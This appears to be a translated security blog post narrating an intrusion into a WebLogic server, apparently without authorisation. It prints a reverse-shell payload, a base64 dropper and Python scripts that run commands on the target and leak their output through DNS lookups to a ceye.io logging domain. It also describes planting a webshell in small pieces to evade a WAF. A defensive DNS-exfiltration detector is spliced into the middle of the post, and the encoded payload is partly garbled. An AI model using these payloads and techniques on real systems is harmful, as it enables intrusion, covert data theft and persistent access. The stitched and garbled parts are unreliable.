
How to use dnslog to execute weblogic commands

2025-02-24 Update. From: SLTechnology News&Howtos > Network Security

Shulou (Shulou.com) 06/01 Report

This article describes how dnslog (a DNS-based out-of-band channel) was used to execute commands on a WebLogic server and read back their output. The content is fairly detailed; interested readers can use it for reference, and I hope it is helpful.

I encountered a WebLogic site.

First, I requested several common WebLogic paths to see which ones exist:

/console/login/LoginForm.jsp
/uddiexplorer/SearchPublicRegistries.jsp
/wls-wsat/CoordinatorPortType
/_async/AsyncResponseService

Luckily, the /_async/AsyncResponseService path was present:

I ran shack2's WebLogic RCE tool against it to verify:

The tool failed, and I suspected the request was being intercepted by a WAF. Out of curiosity I tried the payloads I had collected one by one, and unexpectedly one of them succeeded: a payload that only produces a dnslog record (redacted here):

xxxx com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext http://zdg537uqx2an3qcx104ez2ak6bc10q.burpcollaborator.net

This is the 2729 payload. The corresponding 2729 command-execution payload was then tried, but it failed. A more experienced colleague pointed out that the 2725 payload could be used instead.

So I dug out the 2725 payload that HW had released the previous year (redacted here, with the HTML entity in the original repaired):

xx xx /bin/bash -c bash -i >& /dev/tcp/ip/port 0

But this raised a new problem: this payload cannot echo the result of the command back. I consulted the same colleague again, who suggested retrieving the result through dnslog and also provided the scripts:

p.py (Python 2, as used on the target; the dnslog domain is redacted as xx.ceye.io):

import os
import sys
import subprocess

def exp(cmd, id):
    # Run the command and capture its stdout.
    p = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
    p.wait()
    pipe = p.stdout
    # Sequence counter starts at 100 so that all chunks sort lexically in order.
    i = 100
    while True:
        # 30 bytes -> 60 hex characters, which fits in a single 63-byte DNS label.
        result = pipe.read(30)
        if not result:
            break
        # Each chunk becomes <id>.<seq>.<hex>.xx.ceye.io; only the DNS lookup matters,
        # so wget is told to give up quickly and discard any response body.
        os.popen('wget --no-dns-cache --tries=1 -T 1 --output-document=/dev/null %s.%s.%s.xx.ceye.io' % (id, i, result.encode('hex')))
        i += 1

exp(sys.argv[1], sys.argv[2])

result.py (Python 2; the API token is partially redacted as in the original):

import requests
import sys
from requests.exceptions import RequestException
from requests.packages.urllib3.exceptions import InsecureRequestWarning

dnslog_exec = u"i2kuwq.ceye.io"
dnslog_exec_api = u"http://api.ceye.io/v1/records?token=xxxxxxxxxx1ae18f473ef27d0a&type=dns&filter={0}"

# Query the ceye API for DNS records whose name contains the given id.
req = requests.get(dnslog_exec_api.format(sys.argv[1]), timeout=30)
rsp = req.json()
if rsp[u"data"]:
    # Deduplicate and sort so chunks come out in sequence order (100, 101, ...).
    exec_result = list(set([rsp[u"data"][i][u"name"] for i in xrange(len(rsp[u"data"]))]))
    exec_result.sort()
    # Strip "<id>.<seq>." (4 + 5 characters for a 4-digit id) and the trailing ".<domain>",
    # then hex-decode the concatenated chunks.
    print(u"".join(map(lambda n: n[4 + 5:-1 - len(dnslog_exec)], exec_result)).decode("hex").strip())
else:
    print u"No output."

The idea is as follows:

1. Use echo to write p.py into the /tmp directory, then run it with python. The script executes the command and sends the hex-encoded result to dnslog as a series of DNS lookups.

2. Locally, run result.py, which calls the ceye API to fetch the dnslog records and hex-decodes them to recover the command output.
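The chunked hex-in-subdomain pattern used above is also what a defender can hunt for in DNS query logs: a burst of lookups from one host whose labels are an id, an incrementing counter and a long hex string, all under the same unfamiliar zone. The following Python 3 detector is an added example and is not part of the original article or its scripts; the log line format and the sample lines are constructed for the example, and the zone xx.ceye.io is reused from the article only as a placeholder.

```python
import re
from collections import defaultdict

# Constructed sample resolver log (not from the article). Assumed format:
#   <timestamp> client <ip> query: <qname> IN A
SAMPLE_LOG = """\
2024-06-01T10:00:01Z client 10.0.0.5 query: www.example.com IN A
2024-06-01T10:00:02Z client 10.0.0.7 query: 1234.100.726f6f740a.xx.ceye.io IN A
2024-06-01T10:00:02Z client 10.0.0.7 query: 1234.101.6461656d6f6e0a.xx.ceye.io IN A
2024-06-01T10:00:03Z client 10.0.0.5 query: cdn.example.net IN A
2024-06-01T10:00:03Z client 10.0.0.7 query: 1234.102.6e6f626f64790a.xx.ceye.io IN A
"""

QUERY_RE = re.compile(r"client (?P<src>\S+) query: (?P<qname>\S+) IN")

# <id>.<seq>.<hex payload of at least 4 bytes>.<zone>
CHUNK_RE = re.compile(
    r"^(?P<id>[0-9a-z]+)\.(?P<seq>\d+)\.(?P<hex>(?:[0-9a-f]{2}){4,})\.(?P<zone>.+)$"
)


def parse_queries(log_text):
    """Yield (source_ip, qname) for every query line in the log."""
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            yield m.group("src"), m.group("qname").lower()


def find_exfil_chunks(log_text, min_chunks=2):
    """Group hex-labelled queries by (source, id, zone).

    Returns only groups with at least min_chunks members, which filters out a
    single odd-looking name and keeps sequences, i.e. probable chunked exfiltration.
    """
    groups = defaultdict(dict)
    for src, qname in parse_queries(log_text):
        m = CHUNK_RE.match(qname)
        if not m:
            continue
        key = (src, m.group("id"), m.group("zone"))
        groups[key][int(m.group("seq"))] = m.group("hex")
    return {k: v for k, v in groups.items() if len(v) >= min_chunks}


def reassemble(chunks):
    """Decode the chunks in sequence order so an analyst can see what left the host."""
    data = b"".join(bytes.fromhex(chunks[seq]) for seq in sorted(chunks))
    return data.decode("utf-8", errors="replace")


if __name__ == "__main__":
    for (src, ident, zone), chunks in find_exfil_chunks(SAMPLE_LOG).items():
        print("possible DNS exfiltration from %s (id=%s, zone=%s, %d chunks)"
              % (src, ident, zone, len(chunks)))
        print(reassemble(chunks))
```

Run on a real resolver or DNS-firewall log, the alert should key on the (source, zone) pair; the reassembled text is for triage only, and a noisy zone can be suppressed by adding it to an allowlist before grouping.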

Write the file (the base64 is as it appeared in the original, including the two garbled characters):

touch /tmp/pp.py && echo aW1wb3J0IG9zCmltcG9ydCBzeXMKaW1wb3J0IHN1YnByb2Nlc3MKCmRlZiBleHAoY21kLCBpZCk6CiAgICBwID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwc**jZXNzLlBJUEUpCiAgICBwLndhaXQoKQogICAgcGlwZSA9IHAuc3Rkb3V0CiAgICBpID0gMTAwCiAgICB3aGlsZSBUcnVlOgogICAgICAgIHJlc3VsdCA9IHBpcGUucmVhZCgzMCkKICAgICAgICBpZiBub3QgcmVzdWx0OiBicmVhawogICAgICAgIG9zLnBvcGVuKCd3Z2V0IC0tbm8tZG5zLWNhY2hlIC0tdHJpZXM9MSAtVCAxIC0tb3V0cHV0LWRvY3VtZW50PS9kZXYvbnVsbCAlcy4lcy4lcy4wYWN5ZncuY2V5ZS5pbycgJSAoaWQsIGksIHJlc3VsdC5lbmNvZGUoJ2hleCcpKSkKICAgICAgICBpICs9IDEKCmV4cChzeXMuYXJndlsxXSwgc3lzLmFyZ3ZbMl0pCg== | base64 -d > /tmp/pp.py

Execute the command:

/usr/bin/python /tmp/pp.py command 1234

View the dnslog records:

Read the result locally:

python2 result.py 1235

Finally, I obtained the web root path through the dnslog records and then wrote the webshell file:

Pitfalls encountered while writing the webshell:

1. The site has a WAF that triggers when the POST body exceeds 200 bytes, so the webshell could only be written in segments.

2. I suspect the earlier failure of the verification tools was also because their requests were too long, triggering the WAF so the command never executed.

3. The dnslog records fetched through the ceye API cannot exceed 5 pages; anything beyond 5 pages is overwritten.

That is all on executing WebLogic commands and reading their output through dnslog. I hope the above is of some help and that you can learn something from it. If you think the article is good, share it so more people can see it.
